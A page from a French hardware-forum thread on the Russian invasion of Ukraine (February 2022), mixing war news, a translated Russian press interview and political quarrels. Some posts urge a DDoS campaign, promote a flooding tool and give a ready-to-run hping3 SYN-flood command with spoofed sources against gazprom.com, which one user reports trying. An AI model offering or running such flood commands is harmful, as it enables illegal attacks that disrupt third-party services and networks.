Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2510 connectés 

 

 

 Mot :   Pseudo :  
  Aller à la page :
 
 Page :   1  2  3  4  5  ..  1794  1795  1796  ..  13601  13602  13603  13604  13605  13606
Auteur Sujet :

Guerre en Ukraine - Spectacle pyrotechnique offert par l'UA à Toropets /!\ FP

n°65295507
Chips
Posté le 27-02-2022 à 08:54:33  profilanswer
 

Reprise du message précédent :

Sasha2012 a écrit :

il faudrait lancer un SETI DDOS @ RUSSIAN FAKE NEWS :o
 
peut etre on peut réouvrir la défunte catégorie SETI@HOME d'hfr pour l'occasion ?
 
je reposte le lien au cas ou : https://vug.pl/takeRussiaDown.html
 
jv le mettre en signature aussi


 
 
Interessant  [:digiamb:1]
 
Je vais rester sur du bon vieux syn flood perso
 

Code :
  1. sudo hping3 www.gazprom.com -p 80 -S --flood -V --rand-source

Message cité 2 fois
Message édité par Chips le 27-02-2022 à 08:55:17
mood
Publicité
Posté le 27-02-2022 à 08:54:33  profilanswer
 

n°65295508
totsukaba
Code Quantum
Posté le 27-02-2022 à 08:54:52  profilanswer
 

_OttO_ a écrit :

*PINCETTES*
Des collabos ukrainiens placeraient eux-mêmes des cibles pour le compte de l'armée russe, 2 videos
https://twitter.com/IntelDoge/statu [...] 3320764422


 
En gros ce qu'un forumeur a posté hier près de chez lui, ça permet de mieux calibrer l'artillerie pour avoir les bonnes distances, mit par soit des unités de sabotage, soit des traitres ouais.  
Faut le virer.


---------------
flickr
n°65295510
deadpool
Vrai jeune
Posté le 27-02-2022 à 08:55:18  profilanswer
 

epsiloneridani a écrit :

 

Comment je ne suis pas surpris de te retrouver en train de défendre le tyran qui envahit le pays voisin sans raison.


C'est les valeurs, ça.  [:pault6:1]


---------------
Tu as un problème avec la sharia fils de pu*e ? Twitter, 19/08/2024
n°65295513
Sebwap
Posté le 27-02-2022 à 08:55:36  profilanswer
 

Shao-Bang a écrit :


Il a l’air d’avoir des sources fiables [:implosion du tibia]


Cette fois ci oui, il sort les trucs un peu avant que ça soit confirmé.

 

n°65295514
petitebrun​ette1
Posté le 27-02-2022 à 08:56:07  profilanswer
 

Requiem a écrit :


 
C'est une réalité


On s'en fout de ce mec, va l'adorer sur son topic, ici c'est HS.


---------------
Reviens,bgx  
n°65295515
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 08:56:14  profilanswer
 


on l'entend pas ramadan sur les papous

 

merci  monsieur ramadan

Message cité 1 fois
Message édité par Coroners le 27-02-2022 à 08:56:23
n°65295520
Jahaa_sv
Posté le 27-02-2022 à 08:57:19  profilanswer
 

knup74 a écrit :

  


C'est complètement wtf, poutine est sénile.

 


 

Non, ça c'est Biden.

 

Poutine a simplement la folie des dictateurs. Personne ne lui dit non dans son cercle et il a donc toujours raison. Même quand il explique que le ciel est rose.

n°65295521
tibo2002
C'est très content.
Posté le 27-02-2022 à 08:57:20  profilanswer
 

Ayrin a écrit :

Vraie question, mais les ressortissants européens actuellement en Russie, notamment les étudiants en échanges universitaires par exemple, ils font quoi eux si d'un coup là y'a plus moyen d'avoir d'argent pour vivre ni de rentrer en France/Europe ? Dommages collatéraux ? :sweat:


Mon colloc qui y est actuellement en vacances a pu anticiper (il est parti le lendemain du début de l'invasion) a prévu le coup et a retiré du cash en France avant de partir


---------------
"Nan mais c'est l'plan d'cam' qui fait tout."
n°65295522
_tchip_
Posté le 27-02-2022 à 08:57:37  profilanswer
 

ce mec
 [:alexandre_alabenne:1]


Message édité par _tchip_ le 27-02-2022 à 08:58:28

---------------
J'adore la France, dans 20-30 ans y en aura plus.
n°65295523
blackmanth​a
Fuck Boeing
Posté le 27-02-2022 à 08:58:01  profilanswer
 

dje33 a écrit :


La partie US n'a pas le contrôle de l'altitude de la station.
 
Dans l'espace Altitude = vitesse
Et la partie US n'a pas de moteur pour gagner de la vitesse.


 
Pour la derniere mission oui ils ont le controle avec le vaisseau cargo.


---------------
Je me souviens
mood
Publicité
Posté le 27-02-2022 à 08:58:01  profilanswer
 

n°65295524
Gilou75
Posté le 27-02-2022 à 08:58:09  profilanswer
 

Sasha2012 a écrit :


Il y a toujours plusieurs sites de la liste qui sont inaccessibles :sol:
 
allez, go le bataillon HFR :o
 
Lien dans ma signature, a ouvrir sur un PC idéalement :o


Euh, j'y connais rien, c'est safe ton truc ?
Je veux bien aider, mais si ça fout mon PC en l'air...
 

n°65295525
antioch_ar​row
Menace mineure
Posté le 27-02-2022 à 08:58:09  profilanswer
 

shebangz a écrit :


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.

 

Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.

 

On a assez dit hier que les troufions russes semblaient surtout très jeunes, totalement perdus, mal ravitaillés, peu ou pas informés sur les raisons pour lesquelles ils se trouvent en Ukraine, voire ils ne savent pas où ils sont. Donc on sait, ça va. Et le topic est donc capable de comprendre que les choses sont parfois nuancées.

 

De la même manière, même si je soutiens les ukrainiens et j'aimerais évidemment pouvoir faire plus pour les aider, les images de soldats russes captifs maltraités me gênent.

 

Faire passer l'autre pour un extrémiste, c'est une tactique grossière, et c'est d'ailleurs exactement ce que fait Poutine. Donc si des intervenants du topic pouvaient s'abstenir de faire de même, ce serait bien.


Message édité par antioch_arrow le 27-02-2022 à 08:58:58

---------------
Saremo il fatale prevalere dell'azione. Per sempre, tutto comincia ora.
n°65295527
Requiem
Posté le 27-02-2022 à 08:58:29  profilanswer
 

petitebrunette1 a écrit :


On s'en fout de ce mec, va l'adorer sur son topic, ici c'est HS.


 
où est-ce quand dans mon post t'arrives à déceler ne serait-ce qu'une infime part d'adoration ? :D
 
Putain mais apprenez à lire : je dis tout l'inverse.

n°65295530
daouar
Shree Uvasaggaharam Stotra
Posté le 27-02-2022 à 08:59:24  profilanswer
 

J'ai été voir un peu les médias Russes et leur couverture de la guerre. Bon, 1tv.ru est down, et de toute façon je ne parle pas russe donc autant voir du coté des journaux. La bonne vieille Pravda, par exemple.
 
On y trouve une interview de militaires ukrainiens capturés, extrait (traduc deepl) de l'entretien avec une médecin militaire :
 
"Les gens meurent partout".
 
Oksana Kravtsova, médecin de tir, également originaire de la région de Luhansk, travaillait comme cuisinière dans une cantine. Elle a terminé son cursus médical et "a décidé de sortir pour sauver des gens". Et contrairement à ses collègues masculins, elle semblait dire exactement ce qu'elle pensait. Sans ostentation, sans défi dans son regard, mais ferme et confiante.
 
- Saviez-vous que les forces armées ukrainiennes tuaient des civils à Louhansk et Donetsk ?
 
- Bien sûr que je le savais. Ils ont été tués pendant huit ans, cette guerre continue.
 
- Et ça ne vous a pas arrêté ?
 
- Au moment où j'ai signé le contrat, il n'y avait pas de guerre comme celle d'il y a un jour.
 
- Saviez-vous qu'en 2014, 2015, des gens ont été tués ici ?
 
- Oui, je savais qu'il y avait une forte guerre à cette époque.
 
- Et vous avez décidé de rejoindre l'armée quand même ?
 
- Oui, je l'ai fait. J'ai décidé de devenir médecin.
 
- Comment avez-vous été capturé ?
 
- J'étais la seule survivante, en tant qu'infirmière, c'est tout. C'est comme ça que j'ai été capturée. J'étais dans le bunker à ce moment-là. Après chaque fort bombardement d'artillerie, je suis sortie et j'ai vérifié s'il y avait des blessés ou pas. La première fois, tout s'est bien passé, tous les gens étaient vivants et en bonne santé à ce moment-là. La deuxième fois, je ne suis pas sorti, car les bombardements étaient très forts. Je suis sorti quand il y avait beaucoup de militaires et de tanks. C'est tout.
 
- Quel âge avez-vous ?
 
- 36.
 
- Donc, quand la guerre a commencé, vous étiez assez âgée pour comprendre ce qui se passait ?
 
- Bien sûr que oui.
 
- Avez-vous des enfants ?
 
- Oui, un enfant. Une fille.
 
- Avez-vous vu les images des enfants assassinés à Donetsk ?
 
- Oui, bien sûr.
 
- Et pourtant vous avez rejoint l'armée. Pourquoi l'avez-vous fait ?
 
- Je ne suis pas allé tuer. Je suis juste allé fournir des soins médicaux.
 
- A quelqu'un qui tue ?
 
- Et ils sont tués aussi, ils sont soignés aussi. Ils se font tuer ici, aussi. Et ils sont tués là-bas.
 
- Maintenant, vous allez rentrer chez vous et vous ne vivrez pas en Ukraine, vous vivrez en LNR. Comment trouvez-vous cette réalité ?
 
- Eh bien, si elle est vraiment déjà là. Dans la ville où je vivais, elle appartenait encore à l'Ukraine. Quand je reviendrai, c'est une question de temps - cela peut être un jour, un mois, un an, cinq. Pendant cette période, beaucoup de choses peuvent changer. L'essentiel est qu'il y ait un bon gouvernement. Que les gens vivent. Peu importe le pays.
 
- Eh bien, pour les personnes qui ont donné leur vie pour cela, c'est très important.
 
- Des gens qui ont donné leur vie pour elle donnent leur vie maintenant. Quand je suis sorti de l'abri et que j'ai vu comment les corps humains étaient mélangés au sol...
 
J'ai pu constater qu'Oksana Kravtsova n'avait aucun regret et était totalement sûre d'avoir raison. Je ne lui ai pas expliqué la différence entre ceux qui exécutaient des ordres criminels et ceux qui se portaient volontaires pour défendre leur patrie. Inutilisable pour l'instant, elle n'a pas encore été reformatée. Peut-être qu'une visite de l'allée des anges à la mémoire des personnes tuées dans le Donbass contribuera à accélérer ce processus.

 
Source : https://www.kp.ru/daily/27369.5/4551555/
 
Ça me donne l'impression que n'importe quel citoyen russe peut lire entre les lignes de la presse contrôlé (par exemple "contrairement à ses collègues masculins, elle semblait dire exactement ce qu'elle pensait". Son interview est un des derniers d'une longue suite de témoignage d'Ukrainiens capturés).
 
La fin donne le ton : "Inutilisable pour l'instant, elle n'a pas encore été reformatée."  :sweat:
 
Edit : et beaucoup d'opposition à la guerre dans les commentaires. Étonnant.


Message édité par daouar le 27-02-2022 à 09:03:51

---------------
Fournisseurs d'énergie | Montres pour avoir l'heure
n°65295531
xilebo
noone
Posté le 27-02-2022 à 08:59:42  profilanswer
 

Gilou75 a écrit :


Euh, j'y connais rien, c'est safe ton truc ?
Je veux bien aider, mais si ça fout mon PC en l'air...

 

[:fredmoul:1]

n°65295533
Chips
Posté le 27-02-2022 à 08:59:59  profilanswer
 

deadpool a écrit :


C'est les valeurs, ça.  [:pault6:1]


 
[:jean_nextgen:8]

n°65295540
elbarto
Posté le 27-02-2022 à 09:01:28  profilanswer
 

_OttO_ a écrit :

*PINCETTES*
Des collabos ukrainiens placeraient eux-mêmes des cibles pour le compte de l'armée russe, 2 videos
https://twitter.com/IntelDoge/statu [...] 3320764422


 
Il y a eu aussi l'info que des barbouzes russes avaient été envoyés depuis plusieurs semaines par Poutine, pour se fondre dans la population ukrainienne,  
pour que le moment venu ils facilitent l'invasion, avec les sabotages, la collecte de renseignements.

n°65295544
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 09:03:15  profilanswer
 

Gilou75 a écrit :


Euh, j'y connais rien, c'est safe ton truc ?
Je veux bien aider, mais si ça fout mon PC en l'air...
 


moi ça me faisait tourner mon DD à 100%, j'ai eu peur, j'ai arrêté :o

n°65295547
usma16
Posté le 27-02-2022 à 09:03:38  profilanswer
 


J'ai lu le fil d'info ce matin et :
Les US sont neutre pour le moment) par rapport à la "sanction SWIFT"  :heink:
Biden exclu les sanctions contre Poutine "personnellement"  :heink:
J'ai raté un truc ?  :heink:

n°65295550
barnabe
Posté le 27-02-2022 à 09:04:01  profilanswer
 

elbarto a écrit :


 
Il y a eu aussi l'info que des barbouzes russes avaient été envoyés depuis plusieurs semaines par Poutine, pour se fondre dans la population ukrainienne,  
pour que le moment venu ils facilitent l'invasion, avec les sabotages, la collecte de renseignements.


Avec le couvre-feu à Kiev cela devient plus difficile pour les saboteurs de se déplacer pour agir.

n°65295553
petitebrun​ette1
Posté le 27-02-2022 à 09:04:20  profilanswer
 

Requiem a écrit :


 
où est-ce quand dans mon post t'arrives à déceler ne serait-ce qu'une infime part d'adoration ? :D
 
Putain mais apprenez à lire : je dis tout l'inverse.


oui, je m'emballe. [:cosmoschtroumpf]  
 
 C'est juste que depuis 2 ou 3 jours (avant je ne suivais pas ce topic), les posts sur Zemmour pullulent, alors qu'il n'a rien à y faire, ses "partisans " essayant de le placer à toutes les sauces , certainement pour lui ramener quelques voix.
C'était pas contre toi en particulier, je suis juste d'accord avec les posts qui râlent contre ça.  :jap:


---------------
Reviens,bgx  
n°65295557
JohnSmith
Executive vice president
Posté le 27-02-2022 à 09:05:17  profilanswer
 

Zeplusoif a écrit :

Apparemment Zelensky a sorti une vidéo ce matin, et a notamment rejeté la proposition de pourparlers à Minsk. Ailleurs, oui, mais pas à Minsk. Il a bien raison


 
Rdv à La Haye

n°65295558
Chips
Posté le 27-02-2022 à 09:05:18  profilanswer
 

Coroners a écrit :


moi ça me faisait tourner mon DD à 100%, j'ai eu peur, j'ai arrêté :o


 
ça consomme de la RAM, si t'es limite c'est normal...

n°65295561
Requiem
Posté le 27-02-2022 à 09:05:58  profilanswer
 

petitebrunette1 a écrit :


oui, je m'emballe. [:cosmoschtroumpf]  
 
 C'est juste que depuis 2 ou 3 jours (avant je ne suivais pas ce topic), les posts sur Zemmour pullulent, alors qu'il n'a rien à y faire, ses "partisans " essayant de le placer à toutes les sauces , certainement pour lui ramener quelques voix.
C'était pas contre toi en particulier, je suis juste d'accord avec les posts qui râlent contre ça.  :jap:


 
Je dénonce quelque chose en y faisant une corrélation qui tend à se vérifier de jour en jour, c'est tout.

n°65295562
brown pape​r bag
Concours de pyjama mental
Posté le 27-02-2022 à 09:06:21  profilanswer
 

Zeplusoif a écrit :

Apparemment Zelensky a sorti une vidéo ce matin, et a notamment rejeté la proposition de pourparlers à Minsk. Ailleurs, oui, mais pas à Minsk. Il a bien raison


Il appelle aussi les biélorusses a voter intelligemment à leur référendum aujourd'hui.

Citation :

L’Ukraine rejette une offre russe de pourparlers en Biélorussie  
 
Le président ukrainien Volodymyr Zelensky a rejeté dimanche une proposition russe de pourparlers en Biélorussie, déclarant que Minsk était complice de l’invasion russe. Il s’est dit prêt à des négociations, mais ailleurs que sur le sol biélorusse.
 
Le Kremlin a annoncé dimanche l’arrivée dans la ville biélorusse de Gomel d’une délégation russe prête à discuter avec Kiev, au quatrième jour de l’offensive massive lancée par Moscou contre l’Ukraine.
 
Le président ukrainien s’est par ailleurs adressé, en russe, aux citoyens de Biélorussie, où un référendum doit décider dimanche du changement de la Constitution, comme le rapporte sur Twitter notre éditoriaslite Sylvie Kauffmann. « Nous sommes vos voisins », dit-il. « Soyez la Biélorussie, pas la Russie. »
 



---------------
Eponyme
n°65295570
taxalot-
Posté le 27-02-2022 à 09:07:34  profilanswer
 

Chips a écrit :


 
 
Interessant  [:digiamb:1]
 
Je vais rester sur du bon vieux syn flood perso
 

Code :
  1. sudo hping3 www.gazprom.com -p 80 -S --flood -V --rand-source



 
J'ai voulu tester,  et faire mon devoir pour aider les Ukrainiens.  
10 secondes plus tard :  
"Chéri, y'a quelque chose qui cloche avec Internet ? J'arrive plus à aller sur Youtube."
Break.
 
Bon ben tant pis les Ukrainiens [:patrick b666:2]


---------------
Journalisme Total ? | Retropudding | Débranchés |
n°65295571
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 09:08:00  profilanswer
 

Chips a écrit :


 
ça consomme de la RAM, si t'es limite c'est normal...


j'ai 32go :o

n°65295572
TrakT
Do nothing.
Posté le 27-02-2022 à 09:08:46  profilanswer
 

gars_lent a écrit :

 


Bon laissez tomber, ce topic commence à me faire flipper.
Je suis complètement en faveur des ukrainiens, je demande juste d’aller plus loin que « méchants russes » et on me taxe de pro Poutine. Sérieux, je voudrais pas vous avoir comme voisin en temps de guerre, le moindre geste suspect et on se ferait balancer :pfff:


Laisse tomber, c'est la police de la pensée habituelle qu'on retrouve sur les topics politiques.

 

Des fascistes en puissance. Tu ne peux pas prendre du recul c'est interdit.


---------------
The world is fucked, and you cannot unfuck it - Freddie Mercury said : "Nothing really matters". So do nothing.
n°65295573
armageddin​don
Posté le 27-02-2022 à 09:08:53  profilanswer
 

C'est quand même assez fantastique de demander une rencontre dans le pays qui sert de tremplin a l'invasion. On sent tout de suite le mec avec qui il faudrait vraiment négocier.
Encore la faute de l'OTAN.


---------------
(topic Reconquête, 18 juin 2024) "Des années à dire que que le problème c’est les arabes pour finir par se faire dépouiller par une blondasse." - Abonisyah
n°65295576
barnabe
Posté le 27-02-2022 à 09:09:04  profilanswer
 

brown paper bag a écrit :


Il appelle aussi les biélorusses a voter intelligemment à leur référendum aujourd'hui.

Citation :

L’Ukraine rejette une offre russe de pourparlers en Biélorussie  
 
Le président ukrainien Volodymyr Zelensky a rejeté dimanche une proposition russe de pourparlers en Biélorussie, déclarant que Minsk était complice de l’invasion russe. Il s’est dit prêt à des négociations, mais ailleurs que sur le sol biélorusse.
 
Le Kremlin a annoncé dimanche l’arrivée dans la ville biélorusse de Gomel d’une délégation russe prête à discuter avec Kiev, au quatrième jour de l’offensive massive lancée par Moscou contre l’Ukraine.
 
Le président ukrainien s’est par ailleurs adressé, en russe, aux citoyens de Biélorussie, où un référendum doit décider dimanche du changement de la Constitution, comme le rapporte sur Twitter notre éditoriaslite Sylvie Kauffmann. « Nous sommes vos voisins », dit-il. « Soyez la Biélorussie, pas la Russie. »
 




Aller en Bielorussie pour Zelinsky, un coup à se faire dérouiller...prends-moi pour un con...comme si la Biélorussie était neutre dans cette histoire...

n°65295577
Sasha2012
Hé mon jeune
Posté le 27-02-2022 à 09:09:19  profilanswer
 

homunculus a écrit :


 
Toi tu sais?  :o  
 
Vas y on attend tes arguments vu que Poutine a traité le gouvernement ukrainien de nazis, on va pouvoir faire le parallèle et comparer.


 

Coroners a écrit :


c'est normal que ça occupe le DD à 100% ? :o


 

Gilou75 a écrit :


Euh, j'y connais rien, c'est safe ton truc ?
Je veux bien aider, mais si ça fout mon PC en l'air...
 


Oui c'est safe mais ça prend pas mal de ressources oui, en gros ça envoie des centaines de requêtes par seconde a tous les sites de la liste pour les surcharger et les rendre inaccessibles

n°65295580
Hellion666
Posté le 27-02-2022 à 09:09:54  profilanswer
 

knup74 a écrit :


 
Effectivement t'es un peu lent d'esprit :o
 
Sérieusement faut être lobotomisé par RT pour défendre les russes.
 
L'Ukraine est un pays indépendant, c'est pas un larbin des russes, ils ont le droit de rejoindre l'OTAN si ils le veulent.
Le Donbass est une région Ukrainienne en conflit, c'est peut être pas très propre par moment mais les russes qui viennent donner des lecon quand on voit comment ils ont traité la Tchétchénie c'est rigolo.
Les "nazis" tu peux en trouver des jolis photos dans toutes les armées d'Europe ou les supporters de foot! Le jour où la France se fera envahir parce qu'il y a 10 connards de néo nazi dans un stade de foot j'apprécierai pas trop perso.
 
 
Personne dit que l'Ukraine n'est parfaite, mais dans le cas présent c'est très manichéen, les méchants Russe (Poutine) envahissent un pays démocratique libre


 
Oui les pays peuvent faire ce qu'ils veulent. Mais derrière il y a souvent des conséquences géopolitique. Donc non ils ne peuvent pas faire ce qu'ils veulent, sauf a s assoir sur les conséquences. Les russes comme les autres  
 
Exemple récent sans guerre : le brexit.  
Exemple récent: le Salvador et le bitcoin.
 
Par contre si tu es un paradis fiscal dans les Antilles, avec moult preuves, ça passe crème.
 
C'est 'e deux poids deux mesures qui rends les trolls insupportables

n°65295581
Nico8101
Posté le 27-02-2022 à 09:09:57  profilanswer
 

Quelle issue vous voyez à cette guerre franchement ? Poutine a-t-il un égo qui lui permette d'encaisser de ne pas gagner ?
 
1) Je vois mal Poutine renoncer de lui-même "oui c'est bon ok les gars je me suis trompé, on remballe tout et tout redevient comme avant".
 
2) Les "pourparlers" que la Russie demande qu'en penser ? Bullshit habituel de la Russie pour manipuler la situation et se donner le beau rôle ou tentative de mettre fin à ce qui est un merdier pour eux aussi ?
 
3) Les sanctions peuvent assécher la Russie pour l'empêcher d'entretenir sa guerre qui s'arrêterait faute de moyens mais il faudrait que les Ukrainiens tiennent vachement longtemps. Est-ce seulement possible ?
 
4) La Russie s'enlise, l'Ukraine garde assez de combattants valides pour résister et utiliser les armes et munitions fournies en quantité virtuellement infinie. L'opinion russe devient de moins en moins complaisante et des dissensions dans l'appareil Poutine apparaissent avec à la clé peut-être un changement de régime.
 
5) Poutine sentant la fin pète complètement les plombs et fait un go all in sur les attaques, bombardements voire pire le nuke sur l'Ukraine et/ou ses soutiens.
 
6) Scénario le moins vraisemblable mais le plus réjouissant : l'Ukraine résiste puis repousse l'envahisseur car moral des troupes au plus bas et moyens finalement médiocres. Ce scénario pourrait cependant amener au point 5).
 
7) Scénario malheureusement le plus probable : la Russie finit par venir à bout de la résistance ukrainienne au prix de nombreuses vies, de nombreuses pertes matérielles et financières. Poutine réussit à placer un pantin contesté à la tête de l'Ukraine qui sera contesté durement. L'Ukraine "devient" russe. Et après ? Combien de temps un telle situation peut-elle tenir ? Tout ça pour quoi ?


---------------
"Désolé mais je n'ai confiance qu'en deux hommes... Le premier c'est moi et l'autre c'est pas vous."
n°65295584
Kalymereau
This is not a method
Posté le 27-02-2022 à 09:10:32  profilanswer
 

_OttO_ a écrit :

*PINCETTES*
Des collabos ukrainiens placeraient eux-mêmes des cibles pour le compte de l'armée russe, 2 videos
https://twitter.com/IntelDoge/statu [...] 3320764422


 

Chips a écrit :


 
 
Interessant  [:digiamb:1]
 
Je vais rester sur du bon vieux syn flood perso
 

Code :
  1. sudo hping3 www.gazprom.com -p 80 -S --flood -V --rand-source



 
 
 [:cerveau klem]  
 
:o


---------------
rm -rf internet/
n°65295585
Princesse ​Ruspoli
Tout est possible
Posté le 27-02-2022 à 09:10:50  profilanswer
 
n°65295587
fred_div91
Posté le 27-02-2022 à 09:10:56  profilanswer
 

TrakT a écrit :


Laisse tomber, c'est la police de la pensée habituelle qu'on retrouve sur les topics politiques.
 
Des fascistes en puissance. Tu ne peux pas prendre du recul c'est interdit.


 
Ils critiquent un homme et un modèle dans lequel ils s'épanouiraient parfaitement.
C'est assez paradoxal (mais intéressant à observer). Je pense que ça explique aussi, leur attitude agressive.

n°65295588
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 09:10:56  profilanswer
 

Sasha2012 a écrit :


Oui c'est safe mais ça prend pas mal de ressources oui, en gros ça envoie des centaines de requêtes par seconde a tous les sites de la liste pour les surcharger et les rendre inaccessibles


 :jap:

n°65295589
Sasha2012
Hé mon jeune
Posté le 27-02-2022 à 09:10:57  profilanswer
 

barnabe a écrit :


Aller en Bielorussie pour Zelinsky, un coup à se faire dérouiller...prends-moi pour un con...comme si la Biélorussie était neutre dans cette histoire...


C'est clair que c'est du foutage de gueule cette proposition  
comme si il avait une chance de quitter Minsk si il y allait.

n°65295592
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 09:11:26  profilanswer
 

Sasha2012 a écrit :


Oui c'est safe mais ça prend pas mal de ressources oui, en gros ça envoie des centaines de requêtes par seconde a tous les sites de la liste pour les surcharger et les rendre inaccessibles


et pour le DD à 100% c'est normal ? :o

n°65295593
_umadjw_
Posté le 27-02-2022 à 09:11:49  profilanswer
 

New de mon ami chir à Kiev : hier et ce matin pas de soldats blessés grièvement dans l’hôpital où il est ( Київська обласна лікарня)  et autres hosto au alentours du centre ( pour le moment ) quelques civils blesses mais rien de très sérieux .
 
La frontière polonaise c’est comme à l’ouverture du Space mountain à Disney ( faut pas être pressé ) je vais rester un peu sur Lviv pour voir  comment cela se passe car c’est pas vraiment aussi bien organisé que sur Kiev . Trop de gens , bcp d’étrangers qui peuvent pas partir car pas assez de voitures ou de bus . Les gens dorment par terre dans les gares ou ailleurs. Mais il y as une sorte de milice protectrice civil sur place qui aident et protège les gens .  
 
A voir si les frontières vont continuer à prendre autant de monde  
 
 

n°65295594
the anakin
Le vrai élu
Posté le 27-02-2022 à 09:12:07  profilanswer
 

gars_lent a écrit :

Je trouve que les médias accentuent beaucoup les gentils ukrainiens vs méchants russes. Il y a vraiment peu de nuances en particulier sur les actions militaires précédentes dans le Donbass de la part de l’Ukraine.
Je dis pas que Poutine a raison mais il faut se méfier de ce genre de story telling… ça parle de guérilla urbaine alors que les habitants se terrent pour se mettre à l’abris.
C’est assez criant sur ce topic d’ailleurs.

 

Tu as raison on se souvient tous des exactions ukrainiennes, leurs multiples invasions, assassinats politiques, l'épuration en Tchétchénie, et comment ils ont contribué à l'invasion de la Géorgie. Vraiment terribles ukrainiens

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5  ..  1794  1795  1796  ..  13601  13602  13603  13604  13605  13606

Aller à :
Ajouter une réponse
 

Sujets relatifs
Je suis encore écoeuré, pas moyen de voir Ukraine-FranceVirus Ebola en Ukraine?
Films & Ukrainermi et caf le bordel
Ecologie - fuite massive de méthane en californie - dernier postC'est quoi ce bordel!? Blackmamba
Cherche adresse ambassade GB en UkraineC'est quoi ce bordel ?
les Iouchtchenko , l'Ukraine et la corruptionLe topic des chambres en bordel [photos inside]
Plus de sujets relatifs à : Guerre en Ukraine - Spectacle pyrotechnique offert par l'UA à Toropets /!\ FP


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR